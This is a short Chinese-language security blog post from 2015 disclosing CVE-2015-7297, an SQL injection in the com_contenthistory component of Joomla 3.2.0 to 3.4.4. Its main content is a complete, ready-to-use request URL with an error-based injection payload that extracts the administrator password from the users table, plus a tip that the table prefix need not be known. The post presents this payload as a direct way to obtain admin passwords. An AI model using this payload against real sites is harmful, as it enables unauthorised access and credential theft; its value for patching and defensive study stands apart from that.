Joomla 3.2.0 – 3.4.4 无限制SQL注入漏洞

CVE-ID: CVE-2015-7297
影响组件: Joomla (3.2.0<=version<=3.4.4) Joomla 3.2.0 - 3.4.4 /administrator/components/com_contenthistory/models/history.php 文件存在未过滤的问题,导致出现SQL注入,可用于获取管理员密码 可用如下payload直接获取管理员密码 [php] http://www.ihonker.org/joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(password)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)[/php] 其中%23_即为joomla表前缀,无需获取表前缀,joomla会自动将#_转换为表前缀。

本文固定链接: https://www.unhonker.com/bug/1852.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2015年10月23日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Joomla 3.2.0 – 3.4.4 无限制SQL注入漏洞 | 90' s Blog|关注网络信息安全
关键字:

Joomla 3.2.0 – 3.4.4 无限制SQL注入漏洞:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!